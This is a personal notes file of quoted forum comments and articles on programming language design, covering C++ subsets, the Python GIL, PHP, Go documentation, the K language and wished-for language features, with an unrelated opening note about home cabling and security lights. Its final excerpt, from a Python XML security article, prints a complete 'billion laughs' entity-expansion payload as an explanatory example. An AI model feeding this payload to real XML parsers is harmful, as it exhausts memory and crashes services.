proj-oot-ootNotes35

1) as long as we are pulling all that cable, let's pull 4 extras. Also, could we do cat6 instead of cat5? How much would these changes raise the cost?

2) i'd like some outdoor security lighting too. It should be motion-activated, (mostly) only on at night, and able to be turned off remotely (for when we want to go outside and have it stay dark). It would be great if it could notify via Z-Wave, Zigbee, IFTTT, a cloud app, or whatever when it activated, but that's not required. What are the options here? Can some of these products be powered via PoE? Is it best to just attach some sort of motion-activated sensor to some sort of switch that controls existing lights? Is it best to just get a Ring spotlight or floodlight camera rather than a standalone lighting product? I recall you mentioned that lights like the Ring floodlight with full AC power would be brighter; do you think that level of brightness would be better at deterring intruders? We have some outdoor power outlets in the back and near the electrical panel, so it's possible that we could power a couple of Ring floodlight cams via those, in addition to or instead of some of the LTS cameras.

---

Aardappel 1 day ago [-]

There should probably be two C++ styleguides: one for library authors and one for library users. For the former, use of std::move can be absolutely essential to abstractions that are both efficient and correct. For the latter, it probably means you're overthinking things.
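For instance (my illustrative sketch, not from the comment): a value-sink setter is the classic library-author case where std::move is essential for being both efficient and correct.

```cpp
#include <cassert>
#include <string>
#include <utility>
#include <vector>

// Hypothetical EventLog type: take the argument by value, then
// std::move it into storage. Callers passing rvalues pay zero copies;
// callers passing lvalues pay exactly one.
struct EventLog {
    std::vector<std::string> lines;
    void add(std::string line) {
        lines.push_back(std::move(line)); // move, don't copy, into the vector
    }
};
```

A library user rarely needs to write this; the library author almost always does.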

reply

---

4bpp 23 hours ago [-]

Personal opinions on the "right subset" of C++:

 - I really wish class memory layout were standardised more, but at least some non-standard assumptions are fairly safe in my experience: e.g. class A : B {...}; B* x; assert((long)static_cast<A*>(x) == (long)x);

 - printf over iostream.

 - (de)allocate classes with new/delete, but POD with malloc/free

 - exception: std::string over char*, because it is really that much more convenient

(I'm very happy to be persuaded otherwise on any of these points.)
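The layout assumption in the first bullet, written out as a compilable sketch (type and function names are mine):

```cpp
#include <cassert>
#include <cstdint>

// The non-standard (but commonly safe) assumption: with single,
// non-virtual inheritance, the B base subobject of an A sits at the
// same address as the A object itself.
struct B { int b; };
struct A : B { int a; };

bool base_at_same_address(B* x) {
    return reinterpret_cast<std::uintptr_t>(static_cast<A*>(x)) ==
           reinterpret_cast<std::uintptr_t>(x);
}
```

This holds on mainstream ABIs but is not guaranteed by the standard, and it breaks once virtual bases or multiple inheritance enter the picture.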

reply

doublerebel 16 hours ago [-]

I have been exceptionally surprised and thankful for the coroutine implementation in C++ and its early adoption in Visual C++ compiler (MSVC). UI and I/O code (particularly for Windows) is much easier to both write and comprehend. The stack traces are clear and error handling is simple.

I have professionally worked in many async (and synchronous) languages, and the implementation of async in modern C++ is my favorite. That is weird to type out, but it's true. I'm really enjoying modern C++, but I do follow almost all the rules you list.

reply

thestoicattack 23 hours ago [-]

No std::unique_ptr?

reply

...

int_19h 21 hours ago [-] ... > No to exceptions; their interaction with other language features is awkward, and the eternal difficulties with platform support make me feel no confidence in the reliability of the feature.

If you ditch exceptions, you might as well ditch constructors as well, since there's no way to report errors from them otherwise. You're also forced to use new(nothrow) then. Basically, the language is designed around exceptions, and excluding them is fighting it.
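A quick sketch of the new(nothrow) point (illustrative function name):

```cpp
#include <cassert>
#include <cstddef>
#include <new>

// Without exceptions, allocation failure has to surface as a null
// pointer rather than a thrown std::bad_alloc.
int* make_buffer(std::size_t n) {
    return new (std::nothrow) int[n]; // nullptr on failure, no throw
}
```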

... > printf over iostream.

Not only do you lose type safety, but it's extremely easy to write code that kinda sorta works but actually doesn't. The most common case is passing a struct with a single field to printf - this is actually implementation-defined, and some implementations detect it and treat it as invalid, while others just put the contents of the struct on the stack. So it sometimes happens that people e.g. pass a std::string that way, expecting it to work with %s - and it does... on that one implementation, and for that particular string. Then it breaks elsewhere.
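The portable alternative is to hand printf-family functions the underlying C string, e.g. (my sketch, hypothetical function name):

```cpp
#include <cassert>
#include <cstdio>
#include <string>

// Pass name.c_str() to the %s conversion, never the std::string
// object itself; the latter is not well-defined.
std::string greet(const std::string& name) {
    char buf[64];
    std::snprintf(buf, sizeof buf, "hello, %s", name.c_str());
    return buf;
}
```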

iostream is still bad though, both design-wise and perf-wise. The answer is actually Boost, which has proper type-safe formatting.

...

> However, avoid situations in which you need dynamic_cast like the plague.

You need dynamic_cast for dynamic interface queries ("does this object support X?"), even in the absence of virtual inheritance.

Some would say that there's no downside to always using it when you can. If what you're doing is an upcast, it's a no-op. If it's a downcast, then at least you get an exception instead of an invalid pointer that may or may not blow up if what you're casting is not of the correct type.
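E.g., a minimal sketch of such an interface query (illustrative type names), using the pointer form of dynamic_cast, which answers with nullptr rather than throwing (the reference form is the one that throws):

```cpp
#include <cassert>

// "Does this object support Printable?" answered at runtime.
struct Shape { virtual ~Shape() = default; };
struct Printable { virtual ~Printable() = default; };
struct Circle : Shape, Printable {};
struct Square : Shape {};

Printable* as_printable(Shape* s) {
    return dynamic_cast<Printable*>(s); // nullptr if unsupported
}
```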

...

4bpp 20 hours ago [-]

> You need dynamic_cast for dynamic interface queries ("does this object support X?"), even in the absence of virtual inheritance.

I prefer using C-style casts for brevity, and implementing support queries like that explicitly (i.e. via a "type" member or GetType() function or whatever in the base class). Quite often, you wind up needing that information anyway (resulting in redundancy), and the C++ casts are extremely verbose and ugly.

...

> printf over iostream

But printf is so much more legible when you have to format complex strings.

...

> Tuple has syntactic support as of C++17:

Yes, ugly, non-principled syntactic support.

  std::tuple<int,int> a = {1,2}; // { }, like most other instances of lists of things
  auto [x,y] = a; // [ ], for some reason (not used for lists/tuples anywhere else)
  auto [z,w] = {1,2}; // this doesn't work at all

Surely being able to abbreviate B=C; A=B; into A=C; is a sane thing to expect when there is no good reason against it.
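For reference, the forms that do compile under C++17 (my sketch, hypothetical function names):

```cpp
#include <cassert>
#include <tuple>
#include <utility>

// { } to build the tuple, [ ] to destructure it.
std::pair<int, int> min_max(int a, int b) {
    return a < b ? std::pair{a, b} : std::pair{b, a};
}

int sum_tuple() {
    std::tuple<int, int> t = {1, 2}; // { } construction
    auto [x, y] = t;                 // [ ] structured binding
    return x + y;
}
```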

...

> If you ditch exceptions, you might as well ditch constructors as well, since there's no way to report errors from them otherwise. You're also forced to use new(nothrow) then. Basically, the language is designed around exceptions, and excluding them is fighting it.

I've worked with a number of embedded platforms that had C++ support without exceptions. As far as I know, there are also still issues when exceptions are thrown through non-C++ stack frames (e.g. a callback invoked from a C library). I'm aware of the problem of errors in constructors, but think that in general it is best to try and write code so that constructors don't do anything that can cause errors (I strongly prefer constructors to only serve the role of putting the object in a coherent state, and having a separate Init function for any nontrivial operations that could fail.)

Memory allocation may be an exception to this, but I feel like code where the sane reaction to OOM is not to treat it as a panic-abort condition is special enough that special measures, such as provisioning an explicit "constructed, but no memory has been acquired" state in your objects, are justified.

I really do want exceptions to work - having worked with Standard ML for a long time, I'm well aware of how right they feel as a solution to error handling - but the C++ implementation of them still feels like it ultimately has way too many moving parts to be trustworthy.
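The constructor-plus-Init discipline described above, sketched (hypothetical Config type):

```cpp
#include <cassert>
#include <string>

// Two-phase construction: the constructor only establishes a coherent
// empty state; Init() does the fallible work and reports errors by
// return value instead of throwing.
class Config {
public:
    Config() = default;                 // cannot fail
    bool Init(const std::string& text) {
        if (text.empty()) return false; // the fallible step
        data_ = text;
        ready_ = true;
        return true;
    }
    bool ready() const { return ready_; }
private:
    std::string data_;
    bool ready_ = false;
};
```

The cost of this pattern is that every object now has an observable "constructed but not initialised" state that the rest of the code must respect.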

---

C vs C++, a guy who switched back to C after using C++:

"I DO miss bits of C++, I miss some of the encapsulation it provides, I miss stack-based objects, and funnily enough, I miss exceptions. But I haven't looked back."

---

mschuetz 1 day ago [-]

I was really looking forward to C++ ranges. However, that blog post by Eric Niebler felt like C++ ranges are trying to get everything right from a CS point of view, but in the process completely ignore usability/legibility, just like the previously introduced list operations that suffer from the requirement to specify start and end iterators. Some of the code samples are an atrocity. The C# example looks so much better to read and easier to understand.

reply

http://ericniebler.com/2018/12/05/standard-ranges/

---

" Go is very opinionated and it's quite obvious that its original design being so radical (no classes, no inheritance, no generics, no macros) was only possible because it was designed by a few very experienced people with a very specific goal in mind. "

---

throwaway487549 30 days ago [-]

I would love to have type-classes à la Haskell (implicits with parametric polymorphism, which is dead-simple and well understood) and universal pattern matching everywhere, but this is, of course, just a dream.

I would love to have ML/Scala-style syntax for curried functions and function definition via pattern-matching with guards, which is also, it seems, out of the question.

Actually, the more of ML a strict language takes in, the better.

What is really funny is that Bell Labs did a lot of ML research, especially on stdlib, but Go team is ignoring everything which is not of the C flavour. Pity.

Again, ML is absolutely wonderful, and type-classes are the single biggest innovation since Smalltalk.

It is better to lean towards ML instead of heading towards Javascript.

---

"The HTDP professors want to make clear that the secret sauce is not Scheme, per se. They use a tuned subset of the language, something made possible by the Racket IDE (formerly DrScheme, now DrRacket):

    Combining SICP with a GUI-based development environment for Scheme won’t work better than plain SICP. The two keys to our success were to tame Scheme into teaching languages that beginners can handle..."

"SICP had a context: it was designed to be an introductory computer science course designed for university engineering students (including CS)...Anyway, I absolutely agree SICP was never about Scheme per se, or even functional programming. Scheme is nice as a teaching tool because, as Sussman likes to say, you can teach everything you need students to know about the language in one lecture. (Not even all of Scheme, mind you, just what you'd use in a 1-semester course, which back when I took 6.001 meant R4RS minus macros and continuations.)"

---

chubot 7 hours ago [-]

I think there's an analogy between the two issues you brought up.

1. A concurrent garbage collector is 10x more work than a single-threaded one. People often don't realize this.

2. A language-independent VM is 10x more work than a VM for a given language. People often don't realize this.

In other words, VMs are tightly coupled to the language they implement, unless you make heroic efforts to ensure otherwise.

WebAssembly is a good example of #2. I think the team is doing a great job, but they are inevitably caught between the constraints of different languages (GC, exceptions, etc.)

The recent submission The Early History of F# sheds some light on this with respect to the CLR:

https://news.ycombinator.com/item?id=18874796

An outreach project called “Project 7” was initiated: the aim was to bring seven commercial languages and seven academic languages to target Lightning at launch. While in some ways this was a marketing activity, there was also serious belief and intent. For help with defining the academic languages James Plamondon turned to Microsoft Research (MSR).

I think this is the only way to design a language-independent VM -- port a whole bunch of languages to it. And there are probably 4 or 5 companies in the world with the resources to do this.

I've seen some VM designs that aim to be generic, but since they were never tested, the authors are mistaken about the range of languages they could efficiently support.

Of course, you can always make a language run on a given VM, but making it run efficiently is the main problem.

reply

pdpi 9 hours ago [-]

> I'd love to see a better separation of language and VMs. I think it's a bit sad that a language designer has to either implement their runtime system from scratch, or has to run it on top of a VM that was designed for another language (Java in the case of Jython).

Wasn't Perl 6's Parrot kind of meant to fulfil that role?

reply

---

std_throwawayay 10 hours ago [-]

The GIL comes with great convenience as you don't have to worry about a whole host of data races. It's no silver bullet but it's mighty convenient if you only do some multi-threading like in a web-server.

Many libraries are not prepared for the disappearance of the GIL and while it's not a general problem for python per se it will be a great amount of work to make every library compatible with GILless python.

Therefore I think that you must always provide an option for the GIL that is enabled by default in order to provide backward compatibility.

reply

std_throwawayay 4 hours ago [-]

Right now you have one mutex for everything (the GIL itself) and everything else doesn't need locking. In order to achieve similar convenience without the GIL you would have to trade this for one mutex for every single data structure. Because the data structures in python are so flexible, every single variable needs its own mutex then. Locking every single variable access would be enormously costly.

Other languages achieve a good compromise by clustering data structures into fewer parts with only a handful of mutexes that are locked while other threads work on different datasets. This is usually done manually and with great care as it is the heart of both safety and performance. I don't know if there is an automatic solution to this problem that is compatible with the way python programs are structured.
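That clustering compromise, sketched in C++ terms (illustrative Stats type): one mutex guards a group of related fields rather than every variable getting its own lock.

```cpp
#include <cassert>
#include <mutex>
#include <vector>

// One mutex for the whole cluster of related data; both fields are
// updated under the same lock, so they stay consistent with each other.
struct Stats {
    std::mutex m;
    std::vector<int> samples;
    long total = 0;
    void add(int v) {
        std::lock_guard<std::mutex> lock(m); // one lock per cluster
        samples.push_back(v);
        total += v;
    }
};
```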

The libraries basically assume that, while you call them, nothing else changes. To ensure that, you need to lock everything down. Because you don't know what these libraries do and what data they access, that means locking everything (like it is today). It should be possible to lock the GIL only when such a library is called, so there could be a middle way forward.

reply

loeg 6 hours ago [-]

It's basically impossible to implement a CPython-compatible language without a GIL (or you lose single thread performance by using very fine-grained atomics/locking). Python has very specific multithreading semantics that are a function of the CPython bytecode and the GIL, and programs rely on this.

reply

int_19h 3 hours ago [-]

Other than refcounting (which is not a part of the Python language spec - it even specifically says that conforming code shouldn't rely on it), what other semantics did you have in mind?

reply

sametmax 3 hours ago [-]

You can list.append from 2 threads without worrying about crashing, although I would not recommend it.

It's possible to do without the GIL, but up to now, it's been damn hard to do.

reply

woolvalley 5 hours ago [-]

I would personally try to move away from python at this point for greenfield projects. The GIL is so baked into the language, if you removed it a bunch of current python code will probably break in subtle ways.

Modern languages need proper multithreading support, static types and fast compile speeds. Use golang, use kotlin, use dart, use anything but python & javascript.

reply

---

trixie_ 11 hours ago [-]

Each PHP file is an endpoint. As opposed to having routers in code or client side SPA routing.

PHP files can be deployed independently, swapped out or updated live.

No building/compiling of the php files needed.

A single layer as opposed to 'modern architecture' where there's client side back/front end layers, api layer, logic, validator, data access, and ORM layers.

Can extend itself as it runs. For example Wordpress, running off of php files can download plugins to its own server (which are just more php files) to instantly extend itself. Without restarting or redeployment. (What other web platforms can do this?)

Intuitive, simple, powerful. Can be as easy as editing a php file in notepad and dropping it on a ftp server. Deployed.

Amazon Lambda may have more in common with PHP in terms of discrete deployable units of functionality. What's old is new again.

Compiling/deploying an entire system to change a single endpoint feels backwards after using PHP.

reply

viraptor 9 hours ago [-]

> Each PHP file is an endpoint. As opposed to having routers in code or client side SPA routing.

Which becomes a security issue due to accidental endpoints or uploads becoming endpoints. Or becomes a mess of imports. Either way, PHP frameworks often end up with a central router anyway.

> PHP files can be deployed independently, swapped out or updated live.

Which means some people try to do that the naive way and end up breaking a few requests that happen during the deployment.

> Can be as easy as editing a php file in notepad and dropping it on a ftp server.

Which causes https://stackoverflow.com/search?q=headers+already+sent+bom&... because people don't realise they had an invisible character before all the code.

I really don't think any of those are a good thing.

reply

mnutt 4 hours ago [-]

Even worse, Tumblr had an incident where they accidentally changed <?php to i?php (my guess would be editing directly on the server with vim?) and exposed not only their source code but also credentials.

https://news.ycombinator.com/item?id=2343351

It would have been possible for tumblr to avoid this with good development practices (don’t edit code live, don’t bake credentials into code, etc) but I imagine there was a culture of doing it at the time.

I don’t think it’s fair to tell developers “use our language, it’s super easy!” and then expect them to discard all of those bad habits as they start putting things in production.

reply

tptacek 12 hours ago [-]

For the kinds of applications people tend to build in PHP, PHP is probably a better choice than Go. I'd still do Django or Rails before PHP, but Go just isn't designed to make serverside-rendered database-backed websites especially pleasant to write.

reply

steve19 12 hours ago [-]

I have not written a new PHP app in years, but recently I had a look at the latest and greatest from the PHP community and it's pretty good. The frameworks and tooling look about as good as you will get anywhere, and PHP appears to be fast now.

reply

joaodlf 7 hours ago [-]

I love Go, for many situations, but definitely not for a typical user facing website.

The community seems bent on the whole "all you need is net/http", but that just isn't practical in modern web development. People like ORMs, easy-to-handle HTML forms, security as a default, easy session/cookie handling, etc. In the end, web developers want ease of life.

Go is a great language for many things, but if it's going to take on the web at large (outside of HTTP APIs), the community needs to grow out of this "net/http or nothing" approach.

There is some hope, some frameworks like https://gobuffalo.io/en are showing up, but the Go ecosystem is dying for a Rails/Django solution.

reply

---

letientai299 1 day ago [-]

Coming from the Java world, I find Go comments and godoc really limited. We can't link between functions and types. We don't have a standard way to declare inputs and outputs, and there's no distinction between a normal word and a Go identifier. Refactoring using a tool (e.g. GoLand) usually leads to unexpected text replacements.

Take the following functions, for example:

  // Auth checks whether the user credential exists in bla, bla...
  // ... (many more explanation)
  func Auth(user User, authProvider AuthProvider) bool

  // AuthDefault checks the user against the default AuthProvider.
  func AuthDefault(user User) bool {
    return Auth(user, new(DefaultAuthProvider))
  }

If only the AuthProvider in the second function's godoc were a link to the first one, we wouldn't have to repeat the explanation for the second one. Devs would be able to discover the explanation easily via their IDE. This alone would be very helpful for the maintainability of any big project.

reply

dilap 1 day ago [-]

Flip-side is less complexity and the doc comments in raw code look better. Go's generally all about, "how much can we strip away and still have things work".

Your criticisms re refactorings and links are on point though.

Trade-offs.

reply

adamlett 20 hours ago [-]

The problem with the Java way, as I see it, is that it puts more of a burden on the programmer to the point where a majority simply won't do it. Getting programmers to document their code is an uphill battle to begin with. But the bureaucracy that Java(doc) imposes makes it even harder to win in all but the most elite institutions. What I see a lot, is IDE-generated documentation which can be automatically inferred from the code, and is therefore redundant. While it superficially looks like documentation, it really is just line noise. I would agree that Java documentation at its best can be better than Go documentation. But I suspect that the average Go codebase is better documented than the average Java codebase.

reply

---

"New languages are usually a grab-bag of features found in C, Java, Lisp and/or Haskell." -- [1]

---

" gpu.js relies on the assumption that the kernel function is using only a subset of legal JavaScript syntax:

    1D, 2D, 3D array of numbers or just numbers as kernel input
    1D, 2D, 3D array of numbers as kernel output
    Number variables
    Custom and custom native functions
    Arithmetic operations (+, +=, -, *, /, %)
    Javascript Math functions (Math.floor() and etc.)
    Loops
    if and else statements
    const and let
    No variables captured by a closure

"

--- "

Although we mourn Midori, it can still teach us broadly applicable, deep lessons. (See especially A Tale Of Three Safeties and The Error Model.) https://en.wikipedia.org/wiki/Midori_(operating_system) http://joeduffyblog.com/2015/11/03/blogging-about-midori/ http://joeduffyblog.com/2015/11/03/a-tale-of-three-safeties/ http://joeduffyblog.com/2016/02/07/the-error-model/

" -- [2]

---

having a package repo is pretty important so that we can steal Rust's trick of analyzing the effect of language changes on diverse, actual code.

--- "

" -- [3]

---

" 4.3.Concrete suggestions ...

-- [4]

---

noir_lord 60 days ago [-]

What a beautifully written article with informative links.

http://lucacardelli.name/Papers/TypefulProg.pdf is now next on my list when I finish reading A Philosophy of Software Design (which is brilliant if you haven't seen it).

nickpsecurity 59 days ago [-]

Cardelli's Modula-3, a C++ alternative, also illustrates an excellent balance of simplicity, programming in the large, compile time, and run time. Expanding on that carefully, with e.g. macros, a borrow checker, and LLVM integration, would have made for a simpler, safer systems language. Give it a C-like syntax with C compatibility, too, for adoption.

https://en.m.wikipedia.org/wiki/Modula-3

pjmlp 59 days ago [-]

You mean C# I guess. :)

Actually, with .NET Native, the GC improvements in .NET 4.6 (TryStartNoGCRegion() and other companion methods), and the C# 7.x improvements taken from Midori, it is quite close.

nickpsecurity 59 days ago [-]

C# looked a lot more complex than Modula-3 when I last looked at it. The book was thick. They definitely did nice things in C#. I just don't know if it's fair to equate it with the simplicity vs. get-shit-done vs. small-runtime balance of Modula-3.

I am up for you elaborating a bit on the second sentence since it sounds interesting. Not doing .NET, I don't know what any of those are except the middle one which sounds like SYSTEM/UNSAFE sections.

pjmlp 59 days ago [-]

It is more complex, but Modula-3 isn't that tiny either, around Algol 68/Ada 83 "tiny".

They integrated the improvements from M#/System C# (Midori) into C#.

Namely: ref returns, ref locals, stack allocation for arrays in safe code, spans (slices) across all memory types, and allocation-free pipelines.

---

64k addressable neurons is enough because it's not like each neuron in the cortex can address every other neuron in the cortex

---

acheron 35 minutes ago [-]

"Javascript Delenda Est", by zeveb, https://news.ycombinator.com/item?id=11447851 :

> Can we please try to stop talking about this specific language ecosystem as an awful deplorable hell hole or whatever?

Back in the second century BC, Cato the Elder ended his speeches with the phrase 'Carthago delenda est,' which is to say, 'Carthage must be destroyed.' It didn't matter what the ostensible topic of the speech was: above all, Carthage must be destroyed.

My opinion towards JavaScript is much like Cato's towards Carthage: it must be rooted out, eliminated and destroyed entirely. I don't know if I'd go quite so far as to say that the fundamental challenge of mass computing is the final destruction of JavaScript — but I want to say it, even though it's false.

JavaScript is a pox, a disaster, a shame. It is the most embarrassingly bad thing to become popular in computing since Windows 3.1. Its one virtue (that it's on every client device) is outshone by its plethora of flaws in much the same way that a matchstick is outshone by the sun, the stars and the primordial energy of the Big Bang added together.

JavaScript is the XML, the Yugo, the Therac-25 of programming languages. The sheer amount of human effort which has been expended working around its fundamental flaws instead of advancing the development of mankind is astounding. The fact that people would take this paragon of wasted opportunity and use it on the server side, where there are so many better alternatives (to a first approximation, every other programming language ever used), is utterly appalling.

JavaScript delenda est.

reply

---

"I try to optimize my code around reducing state, coupling, complexity and code, in that order." [5]

---

a meta-circular interpreter for a small subset of Prolog:

https://news.ycombinator.com/item?id=19294191

---

postscript for a hypercard-like system. Other comments on postscript, homoiconicity:

https://news.ycombinator.com/item?id=18314265

---

terminals

https://news.ycombinator.com/item?id=16014573

---

this looks pretty awesome:

https://github.com/cool-RR/pysnooper

---

"The two most important novelties in K with respect to APL were replacing arrays with heterogeneous lists as the most fundamental data structure and the use of functions with arbitrary number of arguments." [6]

i guess i like hetero lists, but not variadic functions

"Another distinguishing feature of K is the use of dictionaries: associative tables whose keys are symbols, i.e., internalized strings. In turn, dictionaries are the building material of a hierarchically organized global data space called the K-tree."

i think the K-tree is just something like the lexically-scoped environment?

---

"Although there is no distinguishing of verbs by ranks of application other than being atomic or non-atomic (unlike J, where verbs do have ranks associated with them), the level of nesting at which a verb applies can be controlled by modifying the verb by means of adverbs (see the Examples section below)." [7]

---

i don't like this in K:

"Almost all verbs are monadic or dyadic, and most verb designators are ambivalent, having, as in APL and J, both monadic and dyadic meanings.

In general, non-alphanumeric characters are being heavily overloaded. " -- [8]

Apparently the creator of K didn't either; he got rid of it in a later version, Q [9]

---

In K, hofs are not first-class (unlike Haskell and Oot): "As with J and some APLs, grammatical terms such as noun, verb, and adverb are used to describe K, although K does not go as far as J in this respect. A program entity that can be immediately executed is either a verb or a function: it applies to nouns (data items) to produce nouns. An adverb is a meta-, or higher-order function which applies to a verb, function or noun to produce a new verb or function. There are only six predefined adverbs and (unlike J) there is no provision for user-defined ones. " -- [10]

---

" An executing K program can load from files subroutines, in K source or compiled, in order to extend itself dynamically. " -- [11]

---

some other features removed in K4/Q compared to K3:

" Nested functions in K4 and q cannot refer to surrounding function's local variables. (Often, the lack of this ability can be circumvented by making use of function projection.) The support for GUI is dropped from K4 (and q). Also removed is the possibility to attach attributes to data objects. " -- [12]

the first appears to be Python-style closures, and the last appears to be like my attach-metadata-to-graph-nodes idea. Interesting that the K guy ultimately didn't like them after trying them for so long.

---

" the means that the language provides for combining simple ideas to form more complex ideas. Every powerful language has three mechanisms for accomplishing this:

    primitive expressions, which represent the simplest entities the language is concerned with,
    means of combination, by which compound elements are built from simpler ones, and
    means of abstraction, by which compound elements can be named and manipulated as units. 

In programming, we deal with two kinds of elements: procedures and data. (Later we will discover that they are really not so distinct.)

...

Expressions

...

Naming and the Environment

...

We have identified in Lisp some of the elements that must appear in any powerful programming language:

    Numbers and arithmetic operations are primitive data and procedures.
    Nesting of combinations provides a means of combining operations.
    Definitions that associate names with values provide a limited means of abstraction. 

Now we will learn about procedure definitions

...

" -- [13]

---

" Idan Arye

The number one problem that makes a bad language is pitfalls. I define pitfalls as potential bugs that tend to get exposed only after they’ve done some damage. Usually because:

    It makes sense to expect it to work.
    It works in the simple cases.
    It doesn’t work in more complex cases.
    Once you found out it doesn’t work, you have already integrated it in your code – so you need to do lots of refactoring to fix it.

There are other reasons to not like a language, but most of them are a matter of personal taste. But I think everyone would agree that pitfalls are bad. "

---

" Darren Burns Jan 25

Features I like:

    First-class support for package management. When I install a programming language and can't work out within the first hour how to install a 3rd party library I really lose interest. Being able to do something like pip install library_name and for it to just work™ is awesome.
    Error message output for humans. Elm and Rust spring to mind.
    Expression-based languages that let you do something like let x = if something { 1 } else { 2 }.
    Pattern matching (Elixir, Rust, Scala, etc.).
    Languages that explicitly avoid the concept of exceptions and try/catch. Managing a single means of passing values up to a caller is hard enough, so I like the idea of encoding errors in the return value. Rust does this by way of the Result type. In Elixir, you return a tuple which includes information on whether an error occurred.
    match statements like in Rust and Scala that support pattern matching. Bonus points if the compiler enforces that matches are exhaustive.
    Any form of null-safety (e.g. Option types, Elvis operator, etc.). I see a lot of Java code with nested if (variable != null) { ... } checks and find it really hard to read.
    Solid abstractions around concurrency (Actor model, Goroutines etc, compiler-enforced safety guarantees like those in Rust, etc.)
    Quality of life features around debugging (for example, in the latest Rust version, you can do dbg!(something) to print out an object and all of its data without having to implement a toString or similar)
    Native async/await syntax
    If the language is dynamically typed, some form of type annotation syntax to aid static analysis is really helpful. Python 3 has a typing module which you can use in conjunction with static analysis and I've found it to make code significantly more readable and correct.
    The ability to compile to a native binary.

Features I dislike:

    null, NullPointerException, etc.
    Bloated standard libraries. With a first-class, well supported package management system, “official” libraries could be pulled in when they’re needed.
    Inconsistent standard libraries (i.e. lack of convention).
    Excessive verbosity. I’m personally not a huge fan of the do/end syntax in languages like Elixir and Ruby. This is super subjective though and with modern text editors/IDEs it just becomes an aesthetic thing.

I could probably go on all day, but those are the first things that spring to mind! "

" Harvey Thompson Jan 25

Add to that:

    Proper static type system with generics, abstract type members, variadic types, tuple types, function types, a sound and complete type system with set-like operations (and, or, not).
    Flow typing: a variable's deduced type is refined through control flow.
    Garbage collection (of some kind)
    I agree on no exceptions, use types.
    Compiler-as-a-library
    Macros and other meta-programming
    Incremental compilation
    Interactive prompt
    JIT compilation, AOT compilation and scripting
    Support Language Server Protocol (and check it works in vim, emacs, vscode)
    Support the Debug Adapter Protocol (which requires a whole debugger and debug-symbol system)
    Support memory, CPU, and cache profiling tools out of the box (e.g. valgrind et al.)
    Support and/or built-in testing
    Support and/or built-in quality metrics
    Make it open and freely available

"
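The flow-typing item in the list above can be illustrated with Python plus a static checker such as mypy, which refines a variable's deduced type along control-flow branches. A minimal sketch; `stringify` is a made-up name:

```python
from typing import Union

def stringify(x: Union[int, str]) -> str:
    # Flow typing: inside this branch a checker like mypy narrows
    # x from Union[int, str] to str, so .upper() type-checks...
    if isinstance(x, str):
        return x.upper()
    # ...and here x is narrowed to int, so arithmetic type-checks.
    return str(x + 1)
```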

" Christopher Durham Jan 25

I think the main thing that people look for in a modern "alternative" language is convenience and clarity.

Some specific possibilities:

    Pick a "host" language and offer first-class interop. Immediate library ecosystem! (If non-idiomatic.)
    Along the same lines, first-class project build and dependency management. Either integrate with an existing tool or make it as or more convenient than your favorite.
    REPL. Almost a must-have for quickly understanding a new tool today.
    LSP host and Jupyter kernel. Between the two you can support every development environment and awesome tooling in O(1) effort.

And the fun part, some anti-features:

    Syntax overload. You'll pick up a language faster if you don't have to relearn everything.
    Syntax uncanny valley. If it's too similar to a more popular language, people will just use that instead (or accidentally try to use it instead of yours).
    Near-miss paradigms. Similar to your Java number hierarchy, adopting a paradigm almost everywhere but making concessions in some corner cases just makes everything feel rougher.

And one more thing: I think there's the most available space around asynchronous-by-default. Play with an async runtime once you're up and running. There's potential there I haven't seen anyone fully hit. "

" Ben Halpern Jan 25

Ruby has a lot of expressive language features that seem like aliases for other things but are actually a bit different.

For example, and, or, and not exist, which could be interesting alternatives to &&, ||, and !, which are still more common in the language. Except they have subtly different behavior, so you can't really interchange them per se.

Lots of little ways to cut yourself in that way. "

" Ben Halpern Jan 25

Oh, and that's also the best feature of the language. It's been crafted to be expressive and intuitive, not settling for inelegant solutions. Tools like [].empty? and many, many more are really nice to have.

Of course this all comes with performance and memory bloat concerns but it's still a great tool for many jobs.

"

---

a link about bytecode, not sure if worth reading, so i'll just leave it here:

https://paul.bone.id.au/2018/05/10/bytecode-interpreter/

---

" “Making simple things simple” is a long-term goal of mine. Consider the C++11 range-for loop:

for (int& x : v) ++x; // increment each element of the container v

where v can be just about any container. In C and C-style C++, that might look like this:

for (int i=0; i<MAX; i++) ++v[i]; // increment each element of the array v

Some people complained that adding the range-for loop made C++ more complicated, and they were obviously correct because it added a feature, but it made the use of C++ simpler. It also eliminated some common errors with the use of the traditional for loop.

Another example is the C++11 standard thread library. It is far simpler to use and less error-prone than using the POSIX or Windows thread C APIs directly. " -- [14]

---

" Register: Finally, what upcoming C++ features do you feel will be most beneficial for C++ users?

Stroustrup:

    Concepts to significantly simplify generic programming
    Parallel algorithms – there is no easier way to use the power of the concurrency features of modern hardware
    Coroutines, if the committee can decide on those for C++20.
    Modules to improve the way we organize our source code and dramatically improve compile times. I hope we can get such modules, but it is not yet certain that we can do that for C++20.
    A standard networking library, but it is not yet certain that we can do that for C++20.

In addition:

    Contracts (run-time checked pre-conditions, post-conditions, and assertions) could become significant for many.
    The date and time-zone support library will be significant for many (in industry)." -- [15]

---

" 2. Parsing XML

If your application ever loads and parses XML files, the odds are you are using one of the XML standard library modules. There are a few common attacks through XML, mostly DoS-style (designed to crash systems rather than exfiltrate data). Those attacks are common, especially if you’re parsing external (i.e. non-trusted) XML files.

One of those is called “billion laughs”, because of the payload normally containing a lot (billions) of “lols”. Basically, the idea is that you can do referential entities in XML, so when your unassuming XML parser tries to load this XML file into memory it consumes gigabytes of RAM. Try it out if you don’t believe me :-)

<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

